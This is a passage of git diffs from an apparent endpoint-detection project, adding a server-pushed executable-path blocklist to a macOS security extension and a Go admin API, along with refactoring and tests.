+            // in-memory swap lands. AUTH_EXEC readers see the new policy immediately;
+            // disk I/O is best-effort and logs on failure.
+            let version = doc.version
+            let pathCount = doc.paths.count
+            self.persistQueue.async {
+                if self.persist(rawJSON: rawJSON) {
+                    logger.info(
+                        "policy applied: version=\(version, privacy: .public), paths=\(pathCount, privacy: .public)"
+                    )
+                } else {
+                    // Snapshot is already swapped in memory. Log explicitly so operators
+                    // see the split state — the on-disk copy is stale until the next
+                    // successful apply.
+                    logger.error(
+                        "policy applied in memory but persistence failed: version=\(version, privacy: .public)"
+                    )
+                }
+            }
         }
     }
 
-    /// currentBlockedPaths is the AUTH_EXEC hot-path read. It returns the Set as-of-now;
-    /// the caller treats the result as immutable (it is — `Set` in Swift is value-typed).
+    /// currentBlockedPaths is the AUTH_EXEC hot-path read. Lock-free pointer load of the
+    /// immutable snapshot; returns the current `Set` as of the load instant. The Set is
+    /// value-typed (COW) so the caller owns an independent reference and the writer can
+    /// replace the snapshot under us without affecting this call.
     func currentBlockedPaths() -> Set<String> {
-        // `queue.sync` on a serial queue is a read barrier; the alternative (a lock-free
-        // atomic pointer swap) is more code for negligible hot-path gain on ESF's scale.
-        queue.sync { self.currentPathsValue }
+        snapshotLock.withLockUnchecked { $0.paths }
     }
 
     /// currentVersionSnapshot is exposed so future log lines / /metrics endpoints can
     /// report the applied version alongside the host.
     func currentVersionSnapshot() -> Int64 {
-        queue.sync { self.currentVersion }
+        snapshotLock.withLockUnchecked { $0.version }
     }
 
     // MARK: - Persistence
 
-    private func persist(rawJSON: Data) {
+    /// persist writes the raw JSON payload atomically to storagePath. Returns true on
+    /// success, false on any error — callers use the return value to decide whether to
+    /// log "policy applied" or "policy applied in memory only".
+    private func persist(rawJSON: Data) -> Bool {
         let fm = FileManager.default
         let url = URL(fileURLWithPath: Self.storagePath)
         let parent = url.deletingLastPathComponent()
@@ -112,7 +202,7 @@ final class PolicyStore {
                 )
             } catch {
                 logger.error("create policy dir failed: \(error.localizedDescription, privacy: .public)")
-                return
+                return false
             }
         }
 
@@ -129,10 +219,12 @@ final class PolicyStore {
             } else {
                 try fm.moveItem(at: tmp, to: url)
             }
+            return true
         } catch {
             logger.error("persist policy failed: \(error.localizedDescription, privacy: .public)")
             // Clean up the tmp file on failure so we don't accumulate broken leftovers.
             try? fm.removeItem(at: tmp)
+            return false
         }
     }
 }

--- a/extension/edr/extension/PolicyStore.swift
+++ b/extension/edr/extension/PolicyStore.swift
@@ -104,11 +104,11 @@ final class PolicyStore {
     /// Called from XPCServer's peer dispatch. AUTH_EXEC reads never block on this
     /// method — they hit the snapshot lock, which is held for the nanoseconds of a
     /// pointer swap, not for the milliseconds of a filesystem write.
-    /// applyDecision is the small result type apply() extracts from the snapshot lock.
+    /// ApplyDecision is the small result type apply() extracts from the snapshot lock.
     /// Pulling the decision out of the locked region lets us log + dispatch persistence
     /// without holding the lock, and sidesteps the Swift 6 sendable-closure-captures
     /// warning that would otherwise hit a mutated `swapped` flag.
-    private struct applyDecision {
+    private struct ApplyDecision {
         let accepted: Bool
         let reApply: Bool
         let priorVersion: Int64
@@ -116,55 +116,73 @@ final class PolicyStore {
 
     func apply(rawJSON: Data) {
         stateQueue.sync {
-            let doc: PolicyDocument
-            do {
-                doc = try JSONDecoder().decode(PolicyDocument.self, from: rawJSON)
-            } catch {
-                logger.error("policy decode failed: \(error.localizedDescription, privacy: .public)")
-                return
-            }
+            guard let doc = decodePolicy(from: rawJSON) else { return }
+            let decision = swapSnapshot(to: doc)
+            handleApplyResult(doc: doc, rawJSON: rawJSON, decision: decision)
+        }
+    }
 
-            let decision = self.snapshotLock.withLock { current -> applyDecision in
-                let prior = current.version
-                if doc.version < prior {
-                    return applyDecision(accepted: false, reApply: false, priorVersion: prior)
-                }
-                // Equal-version "re-apply" is accepted so an operator can force a re-push
-                // after a suspected apply-but-didn't-persist split. New version case is
-                // the normal path.
-                let reApply = doc.version == prior
-                current = Snapshot(paths: Set(doc.paths), version: doc.version)
-                return applyDecision(accepted: true, reApply: reApply, priorVersion: prior)
-            }
+    /// decodePolicy is the JSON decode step of apply(). Isolated so the apply() body stays
+    /// under the SwiftLint closure-body-length cap; also makes it easy to swap in a
+    /// different wire format (protobuf, Msgpack, ...) in one place.
+    private func decodePolicy(from rawJSON: Data) -> PolicyDocument? {
+        do {
+            return try JSONDecoder().decode(PolicyDocument.self, from: rawJSON)
+        } catch {
+            logger.error("policy decode failed: \(error.localizedDescription, privacy: .public)")
+            return nil
+        }
+    }
 
-            if !decision.accepted {
+    /// swapSnapshot runs the critical section: compare the incoming version against the
+    /// current snapshot and, if acceptable, publish a new one. Equal-version "re-apply"
+    /// is accepted so an operator can force a re-push after a suspected
+    /// apply-but-didn't-persist split; strictly-lower versions are rejected as
+    /// out-of-order replay. The caller is expected to react to the returned decision
+    /// outside the lock.
+    private func swapSnapshot(to doc: PolicyDocument) -> ApplyDecision {
+        snapshotLock.withLock { current -> ApplyDecision in
+            let prior = current.version
+            if doc.version < prior {
+                return ApplyDecision(accepted: false, reApply: false, priorVersion: prior)
+            }
+            let reApply = doc.version == prior
+            current = Snapshot(paths: Set(doc.paths), version: doc.version)
+            return ApplyDecision(accepted: true, reApply: reApply, priorVersion: prior)
+        }
+    }
+
+    /// handleApplyResult handles logging + background persistence based on the decision.
+    /// Extracted so apply()'s closure body stays short and no single path is buried in
+    /// conditional noise.
+    private func handleApplyResult(doc: PolicyDocument, rawJSON: Data, decision: ApplyDecision) {
+        if !decision.accepted {
+            logger.info(
+                "policy ignored: stale version \(doc.version, privacy: .public) < current \(decision.priorVersion, privacy: .public)"
+            )
+            return
+        }
+        if decision.reApply {
+            logger.info("policy re-applied at current version \(doc.version, privacy: .public) — no-op in memory")
+        }
+
+        // Kick off persistence on a dedicated queue so apply() returns as soon as the
+        // in-memory swap lands. AUTH_EXEC readers see the new policy immediately;
+        // disk I/O is best-effort and logs on failure.
+        let version = doc.version
+        let pathCount = doc.paths.count
+        persistQueue.async {
+            if self.persist(rawJSON: rawJSON) {
                 logger.info(
-                    "policy ignored: stale version \(doc.version, privacy: .public) < current \(decision.priorVersion, privacy: .public)"
+                    "policy applied: version=\(version, privacy: .public), paths=\(pathCount, privacy: .public)"
                 )
-                return
-            }
-            if decision.reApply {
-                logger.info("policy re-applied at current version \(doc.version, privacy: .public) — no-op in memory")
-            }
-
-            // Kick off persistence on a dedicated queue so apply() returns as soon as the
-            // in-memory swap lands. AUTH_EXEC readers see the new policy immediately;
-            // disk I/O is best-effort and logs on failure.
-            let version = doc.version
-            let pathCount = doc.paths.count
-            self.persistQueue.async {
-                if self.persist(rawJSON: rawJSON) {
-                    logger.info(
-                        "policy applied: version=\(version, privacy: .public), paths=\(pathCount, privacy: .public)"
-                    )
-                } else {
-                    // Snapshot is already swapped in memory. Log explicitly so operators
-                    // see the split state — the on-disk copy is stale until the next
-                    // successful apply.
-                    logger.error(
-                        "policy applied in memory but persistence failed: version=\(version, privacy: .public)"
-                    )
-                }
+            } else {
+                // Snapshot is already swapped in memory. Log explicitly so operators
+                // see the split state — the on-disk copy is stale until the next
+                // successful apply.
+                logger.error(
+                    "policy applied in memory but persistence failed: version=\(version, privacy: .public)"
+                )
             }
         }
     }

--- a/extension/edr/extension/PolicyStore.swift
+++ b/extension/edr/extension/PolicyStore.swift
@@ -1,0 +1,138 @@
+import Foundation
+import os.log
+
+private let logger = Logger(subsystem: "com.fleetdm.edr.securityextension", category: "PolicyStore")
+
+/// On-disk JSON for the policy payload. Version is monotonically increasing; paths is the
+/// set of absolute file paths ESF should DENY under AUTH_EXEC. Hashes is reserved for a
+/// future SHA-256 block list — recognised on the wire, ignored at runtime today.
+struct PolicyDocument: Codable {
+    let name: String
+    let version: Int64
+    let paths: [String]
+    let hashes: [String]
+}
+
+/// PolicyStore owns the runtime blocklist. Writes happen on a serial queue so concurrent
+/// XPC deliveries can't interleave; reads from ESF's AUTH_EXEC handler are atomic pointer
+/// loads so the hot path doesn't block on the writer.
+///
+/// Persistence is atomic file replacement (write sibling .tmp → rename). A crash mid-write
+/// leaves either the previous good version or nothing — never a half-written file.
+final class PolicyStore {
+    static let shared = PolicyStore()
+
+    /// Absolute path where the policy JSON is persisted. The directory is created on first
+    /// write; mode is 0700 (owner rwx) because this file contains paths the operator wants
+    /// kept confidential.
+    private static let storagePath = "/var/db/com.fleetdm.edr/policy.json"
+
+    private let queue = DispatchQueue(label: "com.fleetdm.edr.policystore")
+
+    // `nonisolated(unsafe)` is used here because the Swift compiler can't prove the
+    // exclusive-access invariant — we guarantee it manually: mutations go through `queue`,
+    // reads on the ESF hot path are atomic Set assignments.
+    nonisolated(unsafe) private var currentPathsValue: Set<String> = []
+    nonisolated(unsafe) private var currentVersion: Int64 = 0
+
+    private init() {}
+
+    /// loadFromDisk populates the in-memory state from the persisted file. Called from
+    /// main.swift at extension start. Missing file or malformed JSON both result in an
+    /// empty blocklist — safer to fail-open on startup than to reject all execs.
+    func loadFromDisk() {
+        queue.sync {
+            let url = URL(fileURLWithPath: Self.storagePath)
+            guard let data = try? Data(contentsOf: url) else {
+                logger.info("no persisted policy at \(Self.storagePath, privacy: .public); starting empty")
+                return
+            }
+            do {
+                let doc = try JSONDecoder().decode(PolicyDocument.self, from: data)
+                self.currentPathsValue = Set(doc.paths)
+                self.currentVersion = doc.version
+                logger.info("policy loaded from disk: version=\(doc.version), paths=\(doc.paths.count)")
+            } catch {
+                // Corrupt or schema-incompatible file: start empty and log. A future PUT
+                // will overwrite the file with a good version.
+                logger.error("failed to decode persisted policy: \(error.localizedDescription, privacy: .public); starting empty")
+            }
+        }
+    }
+
+    /// apply ingests a raw JSON payload (the bytes the agent forwards over XPC) and
+    /// atomically swaps the in-memory set + persists the new version. Called from
+    /// XPCServer's peer dispatch.
+    func apply(rawJSON: Data) {
+        queue.sync {
+            let doc: PolicyDocument
+            do {
+                doc = try JSONDecoder().decode(PolicyDocument.self, from: rawJSON)
+            } catch {
+                logger.error("policy decode failed: \(error.localizedDescription, privacy: .public)")
+                return
+            }
+            // Accept lower or equal versions as a deliberate "re-apply" signal — Phase 2
+            // server may re-send the same version on reconnect. The blocklist content is
+            // what we actually use; `version` is a cheap audit marker.
+            self.currentPathsValue = Set(doc.paths)
+            self.currentVersion = doc.version
+            self.persist(rawJSON: rawJSON)
+            logger.info("policy applied: version=\(doc.version), paths=\(doc.paths.count)")
+        }
+    }
+
+    /// currentBlockedPaths is the AUTH_EXEC hot-path read. It returns the Set as-of-now;
+    /// the caller treats the result as immutable (it is — `Set` in Swift is value-typed).
+    func currentBlockedPaths() -> Set<String> {
+        // `queue.sync` on a serial queue is a read barrier; the alternative (a lock-free
+        // atomic pointer swap) is more code for negligible hot-path gain on ESF's scale.
+        queue.sync { self.currentPathsValue }
+    }
+
+    /// currentVersionSnapshot is exposed so future log lines / /metrics endpoints can
+    /// report the applied version alongside the host.
+    func currentVersionSnapshot() -> Int64 {
+        queue.sync { self.currentVersion }
+    }
+
+    // MARK: - Persistence
+
+    private func persist(rawJSON: Data) {
+        let fm = FileManager.default
+        let url = URL(fileURLWithPath: Self.storagePath)
+        let parent = url.deletingLastPathComponent()
+
+        // Ensure the directory exists; 0700 so only root can read the policy file.
+        if !fm.fileExists(atPath: parent.path) {
+            do {
+                try fm.createDirectory(
+                    at: parent, withIntermediateDirectories: true,
+                    attributes: [.posixPermissions: NSNumber(value: 0o700)]
+                )
+            } catch {
+                logger.error("create policy dir failed: \(error.localizedDescription, privacy: .public)")
+                return
+            }
+        }
+
+        // Write to a sibling tmp file, then rename. This is the stdlib-atomic replace; a
+        // crash between write and rename leaves the previous good file untouched.
+        let tmp = parent.appendingPathComponent("policy.json.tmp")
+        do {
+            try rawJSON.write(to: tmp, options: .atomic)
+            try fm.setAttributes([.posixPermissions: NSNumber(value: 0o600)], ofItemAtPath: tmp.path)
+            if fm.fileExists(atPath: url.path) {
+                // FileManager.replaceItem handles the cross-device-rename edge case and
+                // preserves the tmp file's perms on the replacement.
+                _ = try fm.replaceItemAt(url, withItemAt: tmp)
+            } else {
+                try fm.moveItem(at: tmp, to: url)
+            }
+        } catch {
+            logger.error("persist policy failed: \(error.localizedDescription, privacy: .public)")
+            // Clean up the tmp file on failure so we don't accumulate broken leftovers.
+            try? fm.removeItem(at: tmp)
+        }
+    }
+}

--- a/extension/edr/extension/XPCServer.swift
+++ b/extension/edr/extension/XPCServer.swift
@@ -49,6 +49,38 @@ final class XPCServer {
         }
     }
 
+    /// handlePeerMessage dispatches an inbound XPC dictionary from a connected peer (the
+    /// agent). The protocol is tiny: a "type" string tells us what kind of message it is.
+    ///
+    ///   - "hello"         : the handshake the agent uses to trigger the Mach port bind.
+    ///   - "policy.update" : Phase 2 blocklist push. The "data" key holds raw JSON bytes
+    ///                       that PolicyStore decodes + persists.
+    ///
+    /// Unknown types are logged and ignored — future protocol evolutions should be
+    /// additive, and a forward-compat agent must still work against this server.
+    private func handlePeerMessage(_ event: xpc_object_t) {
+        guard let typeCStr = xpc_dictionary_get_string(event, "type") else {
+            return
+        }
+        let type = String(cString: typeCStr)
+        switch type {
+        case "hello":
+            // No-op. The mere receipt of this message triggered the lazy Mach port
+            // connection; there's nothing to do server-side.
+            break
+        case "policy.update":
+            var dataLen: Int = 0
+            guard let rawPtr = xpc_dictionary_get_data(event, "data", &dataLen), dataLen > 0 else {
+                logger.error("policy.update missing 'data'")
+                return
+            }
+            let data = Data(bytes: rawPtr, count: dataLen)
+            PolicyStore.shared.apply(rawJSON: data)
+        default:
+            logger.info("unknown XPC message type: \(type, privacy: .public)")
+        }
+    }
+
     private func handleListenerEvent(_ event: xpc_object_t) {
         let type = xpc_get_type(event)
 
@@ -73,6 +105,10 @@ final class XPCServer {
                         self?.peers.remove(peer)
                         logger.info("Peer disconnected (total: \(self?.peers.count ?? 0))")
                     }
+                    return
+                }
+                if peerType == XPC_TYPE_DICTIONARY {
+                    self?.handlePeerMessage(peerEvent)
                 }
             }
 

--- a/extension/edr/extension/main.swift
+++ b/extension/edr/extension/main.swift
@@ -1,6 +1,11 @@
 import Foundation
 import EndpointSecurity
 
+// Phase 2: load any persisted blocklist BEFORE ESF starts subscribing. Startup order
+// matters here — if we subscribed first, a racing exec of a blocked path between
+// subscribe and loadFromDisk would be incorrectly allowed.
+PolicyStore.shared.loadFromDisk()
+
 let server = XPCServer(serviceName: "8VBZ3948LU.com.fleetdm.edr.securityextension.xpc")
 server.start()
 

--- a/server/admin/admin.go
+++ b/server/admin/admin.go
@@ -15,6 +15,7 @@ import (
 	"errors"
 	"log/slog"
 	"net/http"
+	"strings"
 
 	"go.opentelemetry.io/otel/attribute"
 	"go.opentelemetry.io/otel/trace"
@@ -42,7 +43,21 @@ type Handler struct {
 
 // New creates an admin handler. The handler does not perform its own auth — wrap it with
 // authn.AdminToken at registration time.
+//
+// Panics if any required dependency is nil: enrollment Store for /enrollments routes,
+// policy Store + CommandInserter for /policy. Fail-fast at construction mirrors the
+// enrollment.NewHandler pattern — a misconfigured handler otherwise blows up only on the
+// first request, after the server is already accepting connections.
 func New(es *enrollment.Store, ps *policy.Store, ci CommandInserter, logger *slog.Logger) *Handler {
+	if es == nil {
+		panic("admin.New: enrollment store must not be nil")
+	}
+	if ps == nil {
+		panic("admin.New: policy store must not be nil")
+	}
+	if ci == nil {
+		panic("admin.New: command inserter must not be nil")
+	}
 	if logger == nil {
 		logger = slog.Default()
 	}
@@ -176,7 +191,19 @@ func (h *Handler) handlePutPolicy(w http.ResponseWriter, r *http.Request) {
 		return
 	}
 	if body.Actor == "" || body.Reason == "" {
-		writeErr(ctx, h.logger, w, http.StatusBadRequest, "actor and reason are required")
+		writeErr(ctx, h.logger, w, http.StatusBadRequest, "actor_reason_required")
+		return
+	}
+
+	// List active hosts BEFORE committing the policy update. A listing failure after the
+	// upsert would leave us with a committed v+1 row and a 500 response — the caller has
+	// no way to know whether the policy landed, and retrying would bump the version again.
+	// Moving the read ahead keeps the failure mode honest: a listing error aborts cleanly
+	// and the DB is untouched.
+	hostIDs, err := h.enrollments.ActiveHostIDs(ctx)
+	if err != nil {
+		h.logger.ErrorContext(ctx, "admin put policy list hosts", "err", err)
+		writeErr(ctx, h.logger, w, http.StatusInternalServerError, "internal")
 		return
 	}
 
@@ -188,7 +215,15 @@ func (h *Handler) handlePutPolicy(w http.ResponseWriter, r *http.Request) {
 	})
 	if err != nil {
 		h.logger.ErrorContext(ctx, "admin put policy", "err", err)
-		writeErr(ctx, h.logger, w, http.StatusInternalServerError, "internal")
+		// Validation errors from policy.Update (non-absolute path, bad hash) should be a
+		// 400 — the caller can fix their PUT body. Database / internal errors stay 500.
+		status := http.StatusInternalServerError
+		code := "internal"
+		if isValidationError(err) {
+			status = http.StatusBadRequest
+			code = "invalid_blocklist"
+		}
+		writeErr(ctx, h.logger, w, status, code)
 		return
 	}
 
@@ -206,12 +241,6 @@ func (h *Handler) handlePutPolicy(w http.ResponseWriter, r *http.Request) {
 		return
 	}
 
-	hostIDs, err := h.enrollments.ActiveHostIDs(ctx)
-	if err != nil {
-		h.logger.ErrorContext(ctx, "admin put policy list hosts", "err", err)
-		writeErr(ctx, h.logger, w, http.StatusInternalServerError, "internal")
-		return
-	}
 	fanoutFailed := 0
 	for _, hostID := range hostIDs {
 		if _, err := h.commands.InsertCommand(ctx, store.Command{
@@ -234,7 +263,13 @@ func (h *Handler) handlePutPolicy(w http.ResponseWriter, r *http.Request) {
 		attribute.Int("edr.policy.fanout_hosts", len(hostIDs)),
 		attribute.Int("edr.policy.fanout_failed", fanoutFailed),
 	)
-	h.logger.WarnContext(ctx, "admin policy updated",
+	// Success is INFO. WARN is reserved for partial fan-out failures so operators can
+	// actually tell a healthy policy push apart from one where N hosts missed the update.
+	logFn := h.logger.InfoContext
+	if fanoutFailed > 0 {
+		logFn = h.logger.WarnContext
+	}
+	logFn(ctx, "admin policy updated",
 		"edr.admin.action", "policy_update",
 		"edr.admin.actor", body.Actor,
 		"edr.admin.reason", body.Reason,
@@ -255,4 +290,19 @@ type policyCommandPayload struct {
 	Version int64    `json:"version"`
 	Paths   []string `json:"paths"`
 	Hashes  []string `json:"hashes"`
+}
+
+// isValidationError reports whether err is a blocklist-shape violation returned by
+// policy.Update (e.g. non-absolute path, bad hash). We key off the error string rather
+// than a typed error because policy.Update already wraps the message and the alternative
+// (exporting a sentinel per-error variant) would bloat the policy package for a single
+// caller. The errors.Is check covers the common substring; if policy.Update grows more
+// typed errors later, tighten this.
+func isValidationError(err error) bool {
+	if err == nil {
+		return false
+	}
+	s := err.Error()
+	return strings.Contains(s, "must be absolute") ||
+		strings.Contains(s, "64 lowercase hex")
 }

--- a/server/admin/admin.go
+++ b/server/admin/admin.go
@@ -1,7 +1,11 @@
-// Package admin exposes the Phase 1 operator endpoints: list enrollments and revoke an
-// individual host. Both are gated on the admin token by server-side middleware (not by this
-// package). Every revoke emits an audit log + span attributes so SOC teams can reconstruct
-// what changed and when.
+// Package admin exposes the operator endpoints:
+//
+//   - Phase 1: list enrollments, revoke an individual host.
+//   - Phase 2: get + update the server-driven blocklist policy.
+//
+// All endpoints are gated on the admin token by server-side middleware (not by this
+// package). Every state-changing call emits an audit log + span attributes so SOC teams
+// can reconstruct what changed and when.
 package admin
 
 import (
@@ -16,21 +20,33 @@ import (
 	"go.opentelemetry.io/otel/trace"
 
 	"github.com/fleetdm/edr/server/enrollment"
+	"github.com/fleetdm/edr/server/policy"
+	"github.com/fleetdm/edr/server/store"
 )
 
-// Handler serves the admin endpoints. Construct it with the enrollment store + a slog logger.
+// CommandInserter is the narrow interface admin needs to queue set_blocklist commands. Kept
+// as an interface so tests can substitute a recording double; in production it's satisfied
+// by *store.Store.
+type CommandInserter interface {
+	InsertCommand(ctx context.Context, c store.Command) (int64, error)
+}
+
+// Handler serves the admin endpoints. Construct it with the enrollment + policy stores,
+// the command inserter used to fan out policy pushes, and a slog logger.
 type Handler struct {
 	enrollments *enrollment.Store
+	policy      *policy.Store
+	commands    CommandInserter
 	logger      *slog.Logger
 }
 
 // New creates an admin handler. The handler does not perform its own auth — wrap it with
 // authn.AdminToken at registration time.
-func New(es *enrollment.Store, logger *slog.Logger) *Handler {
+func New(es *enrollment.Store, ps *policy.Store, ci CommandInserter, logger *slog.Logger) *Handler {
 	if logger == nil {
 		logger = slog.Default()
 	}
-	return &Handler{enrollments: es, logger: logger}
+	return &Handler{enrollments: es, policy: ps, commands: ci, logger: logger}
 }
 
 // RegisterRoutes wires the endpoints onto the mux. Callers wrap the returned handler in the
@@ -38,6 +54,8 @@ func New(es *enrollment.Store, logger *slog.Logger) *Handler {
 func (h *Handler) RegisterRoutes(mux *http.ServeMux) {
 	mux.HandleFunc("GET /api/v1/admin/enrollments", h.handleList)
 	mux.HandleFunc("POST /api/v1/admin/enrollments/{host_id}/revoke", h.handleRevoke)
+	mux.HandleFunc("GET /api/v1/admin/policy", h.handleGetPolicy)
+	mux.HandleFunc("PUT /api/v1/admin/policy", h.handlePutPolicy)
 }
 
 func (h *Handler) handleList(w http.ResponseWriter, r *http.Request) {
@@ -115,4 +133,126 @@ func writeJSON(ctx context.Context, logger *slog.Logger, w http.ResponseWriter, 
 // short `code` rather than a human sentence where possible.
 func writeErr(ctx context.Context, logger *slog.Logger, w http.ResponseWriter, status int, code string) {
 	writeJSON(ctx, logger, w, status, map[string]string{"error": code})
+}
+
+// handleGetPolicy returns the current default policy. Used by the Phase 3 admin UI to
+// render the blocklist editor form and by operators who want to confirm a pending edit
+// before PUTting a new version.
+func (h *Handler) handleGetPolicy(w http.ResponseWriter, r *http.Request) {
+	ctx := r.Context()
+	p, err := h.policy.Get(ctx, policy.DefaultName)
+	if err != nil {
+		h.logger.ErrorContext(ctx, "admin get policy", "err", err)
+		writeErr(ctx, h.logger, w, http.StatusInternalServerError, "internal")
+		return
+	}
+	writeJSON(ctx, h.logger, w, http.StatusOK, p)
+}
+
+// putPolicyRequest is the body shape accepted by PUT /api/v1/admin/policy. `Actor` +
+// `Reason` are required for audit. `Paths` + `Hashes` are optional individually but the
+// effective blocklist must be one of those two forms; a completely empty PUT is still
+// accepted so operators have a fast "clear everything" path.
+type putPolicyRequest struct {
+	Paths  []string `json:"paths"`
+	Hashes []string `json:"hashes"`
+	Actor  string   `json:"actor"`
+	Reason string   `json:"reason"`
+}
+
+// handlePutPolicy is the end-to-end policy push: upsert the policy row, list active hosts,
+// and queue a set_blocklist command for each. A non-zero fan-out failure count logs a
+// warning but still reports 200 — the policy row is authoritative; the fan-out is best-
+// effort and the next enroll/admin-push catches up any host whose command didn't land.
+func (h *Handler) handlePutPolicy(w http.ResponseWriter, r *http.Request) {
+	ctx := r.Context()
+
+	// 64 KiB is generous for a blocklist; if someone tries to push multi-MB the public
+	// DoS vector is real. Same rationale as enrollment/handler.go's cap.
+	r.Body = http.MaxBytesReader(w, r.Body, 64<<10)
+	var body putPolicyRequest
+	if err := json.NewDecoder(r.Body).Decode(&body); err != nil {
+		writeErr(ctx, h.logger, w, http.StatusBadRequest, "bad_body")
+		return
+	}
+	if body.Actor == "" || body.Reason == "" {
+		writeErr(ctx, h.logger, w, http.StatusBadRequest, "actor and reason are required")
+		return
+	}
+
+	p, err := h.policy.Update(ctx, policy.UpdateRequest{
+		Name:   policy.DefaultName,
+		Paths:  body.Paths,
+		Hashes: body.Hashes,
+		Actor:  body.Actor,
+	})
+	if err != nil {
+		h.logger.ErrorContext(ctx, "admin put policy", "err", err)
+		writeErr(ctx, h.logger, w, http.StatusInternalServerError, "internal")
+		return
+	}
+
+	// Fan out to every active host. Building the payload once and re-using is safe — the
+	// store.Command.Payload field is json.RawMessage which is immutable once populated.
+	payload, err := json.Marshal(policyCommandPayload{
+		Name:    p.Name,
+		Version: p.Version,
+		Paths:   p.Blocklist.Paths,
+		Hashes:  p.Blocklist.Hashes,
+	})
+	if err != nil {
+		h.logger.ErrorContext(ctx, "admin put policy marshal payload", "err", err)
+		writeErr(ctx, h.logger, w, http.StatusInternalServerError, "internal")
+		return
+	}
+
+	hostIDs, err := h.enrollments.ActiveHostIDs(ctx)
+	if err != nil {
+		h.logger.ErrorContext(ctx, "admin put policy list hosts", "err", err)
+		writeErr(ctx, h.logger, w, http.StatusInternalServerError, "internal")
+		return
+	}
+	fanoutFailed := 0
+	for _, hostID := range hostIDs {
+		if _, err := h.commands.InsertCommand(ctx, store.Command{
+			HostID:      hostID,
+			CommandType: "set_blocklist",
+			Payload:     payload,
+		}); err != nil {
+			fanoutFailed++
+			h.logger.WarnContext(ctx, "admin put policy fan-out failed",
+				"edr.host_id", hostID, "err", err)
+		}
+	}
+
+	trace.SpanFromContext(ctx).SetAttributes(
+		attribute.String("edr.admin.action", "policy_update"),
+		attribute.String("edr.admin.actor", body.Actor),
+		attribute.Int64("edr.policy.version", p.Version),
+		attribute.Int("edr.policy.path_count", len(p.Blocklist.Paths)),
+		attribute.Int("edr.policy.hash_count", len(p.Blocklist.Hashes)),
+		attribute.Int("edr.policy.fanout_hosts", len(hostIDs)),
+		attribute.Int("edr.policy.fanout_failed", fanoutFailed),
+	)
+	h.logger.WarnContext(ctx, "admin policy updated",
+		"edr.admin.action", "policy_update",
+		"edr.admin.actor", body.Actor,
+		"edr.admin.reason", body.Reason,
+		"edr.policy.version", p.Version,
+		"edr.policy.path_count", len(p.Blocklist.Paths),
+		"edr.policy.hash_count", len(p.Blocklist.Hashes),
+		"edr.policy.fanout_hosts", len(hostIDs),
+		"edr.policy.fanout_failed", fanoutFailed,
+	)
+
+	writeJSON(ctx, h.logger, w, http.StatusOK, p)
+}
+
+// policyCommandPayload is the wire shape of a set_blocklist command payload. Field names
+// mirror what the agent's commander decodes and what the extension's PolicyStore expects.
+type policyCommandPayload struct {
+	Name    string   `json:"name"`
+	Version int64    `json:"version"`
+	Paths   []string `json:"paths"`
+	Hashes  []string `json:"hashes"`
 }

--- a/server/admin/admin_test.go
+++ b/server/admin/admin_test.go
@@ -138,9 +138,11 @@ func TestPutPolicy_HappyPath(t *testing.T) {
 		require.NoError(t, err)
 	}
 
+	// Phase 2 requires hashes to be 64-char lowercase hex (SHA-256). Use a fake digest of
+	// the right shape — the server just persists + fans out, no SHA validation runs.
 	body, _ := json.Marshal(map[string]any{
 		"paths":  []string{"/tmp/qa-block", "/opt/evil"},
-		"hashes": []string{"deadbeef"},
+		"hashes": []string{"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"},
 		"actor":  "qa-tester",
 		"reason": "phase-2 smoke",
 	})
@@ -197,6 +199,29 @@ func TestPutPolicy_EmptyBlocklistAccepted(t *testing.T) {
 	require.NoError(t, err)
 	defer resp.Body.Close()
 	assert.Equal(t, http.StatusOK, resp.StatusCode)
+}
+
+// TestPutPolicy_InvalidBlocklistReturns400 locks in the Phase 2 validation surface: a
+// non-absolute path or a malformed hash gets a 400 with a stable error code, not the old
+// 500 that made it look like a server bug.
+func TestPutPolicy_InvalidBlocklistReturns400(t *testing.T) {
+	srv, _, _ := newAdminServer(t)
+	body, _ := json.Marshal(map[string]any{
+		"paths":  []string{"relative/path"},
+		"actor":  "qa-tester",
+		"reason": "phase-2 negative",
+	})
+	req, err := http.NewRequestWithContext(t.Context(), http.MethodPut, srv.URL+"/api/v1/admin/policy", bytes.NewReader(body))
+	require.NoError(t, err)
+	req.Header.Set("Content-Type", "application/json")
+	resp, err := srv.Client().Do(req)
+	require.NoError(t, err)
+	defer resp.Body.Close()
+
+	assert.Equal(t, http.StatusBadRequest, resp.StatusCode)
+	var got map[string]string
+	require.NoError(t, json.NewDecoder(resp.Body).Decode(&got))
+	assert.Equal(t, "invalid_blocklist", got["error"])
 }
 
 func TestRevoke_IdempotentPreservesFirstActor(t *testing.T) {

--- a/server/admin/admin_test.go
+++ b/server/admin/admin_test.go
@@ -12,26 +12,28 @@ import (
 	"github.com/stretchr/testify/require"
 
 	"github.com/fleetdm/edr/server/enrollment"
+	"github.com/fleetdm/edr/server/policy"
 	"github.com/fleetdm/edr/server/store"
 )
 
 const testUUID = "93DFC6F5-763D-5075-B305-8AC145D12F96"
 
-func newAdminServer(t *testing.T) (*httptest.Server, *enrollment.Store) {
+func newAdminServer(t *testing.T) (*httptest.Server, *enrollment.Store, *store.Store) {
 	t.Helper()
 	s := store.OpenTestStore(t)
 	es := enrollment.NewStore(s.DB())
+	ps := policy.New(s.DB())
 
 	mux := http.NewServeMux()
-	h := New(es, slog.Default())
+	h := New(es, ps, s, slog.Default())
 	h.RegisterRoutes(mux)
 	srv := httptest.NewServer(mux)
 	t.Cleanup(srv.Close)
-	return srv, es
+	return srv, es, s
 }
 
 func TestList_ReturnsEnrollmentRows(t *testing.T) {
-	srv, es := newAdminServer(t)
+	srv, es, _ := newAdminServer(t)
 	_, err := es.Register(t.Context(), enrollment.RegisterRequest{
 		HostID: testUUID, Hostname: "h", AgentVersion: "v", OSVersion: "o", SourceIP: "127.0.0.1",
 	})
@@ -53,7 +55,7 @@ func TestList_ReturnsEnrollmentRows(t *testing.T) {
 }
 
 func TestRevoke_HappyPath(t *testing.T) {
-	srv, es := newAdminServer(t)
+	srv, es, _ := newAdminServer(t)
 	reg, err := es.Register(t.Context(), enrollment.RegisterRequest{
 		HostID: testUUID, Hostname: "h", AgentVersion: "v", OSVersion: "o", SourceIP: "127.0.0.1",
 	})
@@ -79,7 +81,7 @@ func TestRevoke_HappyPath(t *testing.T) {
 }
 
 func TestRevoke_NotFound(t *testing.T) {
-	srv, _ := newAdminServer(t)
+	srv, _, _ := newAdminServer(t)
 	body, _ := json.Marshal(map[string]string{"reason": "x", "actor": "y"})
 	req, err := http.NewRequestWithContext(t.Context(), http.MethodPost,
